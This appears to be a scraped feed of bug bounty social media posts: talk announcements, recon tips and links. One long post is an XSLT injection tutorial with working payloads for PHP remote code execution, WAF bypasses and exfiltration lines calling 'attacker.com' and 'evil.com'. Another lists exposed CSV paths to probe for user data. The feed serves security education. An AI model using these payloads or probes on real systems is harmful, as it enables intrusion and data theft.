The wait is over, Amazing Talk of @XHackerx007 from @bsidesahmedabad 2024 is live now, Sharp your skills on Authentication Bypass. @Bugcrowd #bugbountytips #CyberSecurity piped.video/lE9I92YKnV8

🚨New YOUTUBE Video🚨 🙃Missed BSides Ahmedabad 0x05 ??? No worries 😎— we’ve got you covered! 👍🏻 @mcipekci’s talk🎙️, "Abusing Historical DNS Records for Fun & Profit" is now LIVE 🎥on YouTube! 🌐 He dives into what DNS is & why it matters ⚠️ Shows how it can be abused 🎯 Talks subdomain hijacking & VHost enumeration ❓ Plus, an interactive Q&A with the audience! Don’t miss this info-packed session🔥 — watch it now on our YouTube channel! ➡️🔗 piped.video/QnwTkP8VUno?feature… #BSidesAhmedabad #CyberSecurity #Infosec #DNSSecurity #SubdomainHijacking #VHostEnumeration #BugBounty #EthicalHacking #HistoricalDNS #DNSHijacking

Video of my talking in #PHDays at @PTsecurity_EN piped.video/CJnXjWXXB1Y?si=FfsD… Hope you like it and enjoy it #bugbounty #bugbountytip #bugbountytips #infosec

💡 Pro tip: Check /cdn-cgi/trace on live hosts — it leaks internal IPs 👀 Then scan the range (ASN + naabu) → reverse DNS (dnsx) = 🎯 hidden subs. What’s your secret trick for finding hidden subdomains? 👇 Share it 👇 #bugbounty #recon #infosec

The endpoint was : /storage/users.csv Also try more endpoints like /storage/orders.csv /storage/transactions.csv /storage/reports.csv /storage/customers.csv /storage/backups/users_backup.csv /storage/tables/profiles.csv /storage/tables/roles.csv /storage/tables/invoices.csv

💥 ADVANCED XSLT INJECTION: From Info Disclosure to RCE 🔥 Rare. Powerful. Quiet. This is the kind of injection that silently owns backend XML-based applications. 📚 What Is XSLT Injection? XSLT (Extensible Stylesheet Language Transformations) is used to transform XML documents using a special syntax. If an attacker controls the XSLT document or parts of it, they can: •Run server-side functions (like php:function) •Exfiltrate internal system info •Achieve RCE in PHP, file read, or command execution ⸻ ⚙️ Server-Side Behavior (Detection) First, enumerate if XSLT is used by injecting an out-of-context tag like: <xsl:value-of select="system-property('xsl:vendor')"/> If it returns: xsl:vendor = libxslt Or: xsl:version = 1.0 ✅ You’re dealing with a live XSLT backend — typically PHP + libxslt + DOMDocument + XSLTProcessor. ⸻ 🧠 Information Disclosure Injection (Stage 1) 📄 Payload: Leak Backend Library Info <?xml version="1.0"?> <xsl:stylesheet version="1.0" xmlns:xsl="w3.org/1999/XSL/Transform"> <xsl:template match="/"> <xsl:text>Vendor: </xsl:text> <xsl:value-of select="system-property('xsl:vendor')"/> <xsl:text> | Version: </xsl:text> <xsl:value-of select="system-property('xsl:version')"/> </xsl:template> </xsl:stylesheet> ⛏️ Confirms backend XSLT processing engine. Most commonly: •libxslt → PHP (via XSLTProcessor) •MSXML → .NET •Saxon → Java-based ⸻ 💣 Remote Code Execution (Stage 2) ⚠️ Only works when php:function is enabled in PHP libxslt config. ⸻ 🚀 Payload: Execute phpinfo() via XSLT Injection <?xml version="1.0"?> <xsl:stylesheet version="1.0" xmlns:xsl="w3.org/1999/XSL/Transform" xmlns:php="php.net/xsl"> <xsl:template match="/"> <xsl:value-of select="php:function('phpinfo')" /> </xsl:template> </xsl:stylesheet> ✅ Will return full phpinfo() output including: •Loaded modules •Server paths •ENV variables •Open_basedir info ⸻ 🔓 RCE / Command Execution (Stage 3) 🧨 Payload: Execute Shell Commands <?xml version="1.0"?> <xsl:stylesheet version="1.0" xmlns:xsl="w3.org/1999/XSL/Transform" xmlns:php="php.net/xsl"> <xsl:template match="/"> <xsl:variable name="cmd" select="'whoami'" /> <xsl:value-of select="php:function('shell_exec', $cmd)" /> </xsl:template> </xsl:stylesheet> 🧬 You can swap whoami with: •cat /etc/passwd •curl attacker.com/exfil?$(hostnam…) •ls -la /var/www/ ⸻ 🕳 Bypass Filters / WAF Confusion WAFs may block php:function, but not encoded or obfuscated variants: ✅ Variant: Obfuscated Namespaces xmlns:custom="php.net/xsl" <xsl:value-of select="custom:function('phpinfo')" /> ✅ Variant: CDATA-Based Execution <xsl:text disable-output-escaping="yes"> <![CDATA[<?php system('id'); ?>]]> </xsl:text> Works when XSLT result is injected into an interpreted .php file or template. ⸻ 📤 Exfiltration Payload (Blind) <xsl:variable name="cmd" select="'curl evil.com/$(whoami)'" /> <xsl:value-of select="php:function('shell_exec', $cmd)" /> ⸻ 🛠 Real-World Vulnerable Functions (Watch for These in PHP) $xml = new DOMDocument(); $xml->load($user_supplied_xml); $xsl = new DOMDocument(); $xsl->load($user_supplied_xsl); // ❗ Injection point $proc = new XSLTProcessor(); $proc->registerPHPFunctions(); // ❗ Enables RCE $proc->importStylesheet($xsl); echo $proc->transformToXML($xml);

It's pure happiness when I see anyone find a bug using my tips! It makes my day!

great tip by @XHackerx007 if you are not finding any dll files try this method appNAME.FUZZ.dll. @ctbbpodcast @Bugcrowd #bugbountytips

5 Ways to escalate your subdomain takeover vulnerability: 🤠 • Leaking OAuth/SSO tokens via open URL redirects • Accessing sensitive session cookies via loose cookie policies • Exploiting CSRF & CORS vulnerabilities • Bypassing CSP restrictions

Wish to dive deeper into GraphQL hacking? Read our comprehensive article on this topic! 👇 intigriti.com/researchers/bl…

GraphQL quick wins (more in next post)! 🤠 👇

DAY 13/365 - Read more about subdomain takeover intigriti.com/researchers/bl… - Reported a CSRF that leads to a 1-click ATO, provided the requested details, which the program asked of, and it's now under review; hoping for the best. - @d3q0w and I were working to escalate it to a 0-click ATO; it partially worked on my end, man, i just need more time to look into it.

🚨 Bug Bounty Tip This is The Best IDOR Checklist You Need to Master! Credit: @Yass1nMohamed #bugbounty #bugbountytips #CyberSecurity #IDOR #Hacking

Bug Bounty Tool: Use 'dnsx' to resolve and probe subdomains fast. Supports custom resolvers, wildcard filtering, and JSONL output. github.com/projectdiscovery/…

Years ago, web cache poisoning was a theory few cared about. Now it’s one of the most lucrative attack surfaces in bug bounty programs. I studied 20+ real reports — breaking down: • ⚔️ Techniques • ⚙️ Root causes • 💡 Key takeaways Read the full breakdown 👇 medium.com/@Aacle/20-cache-p…

When I condense nine months of research discoveries into a 40-min talk, it can make it seem easy. For a taster of the true experience, watch my battle to solve the 0-CL @WebSecAcademy lab! Research is persistence. piped.video/live/B7p8dIB7bFg

old but good epi052.gitlab.io/notes-to-se…

😛 rikeshbaniya.medium.com/acco…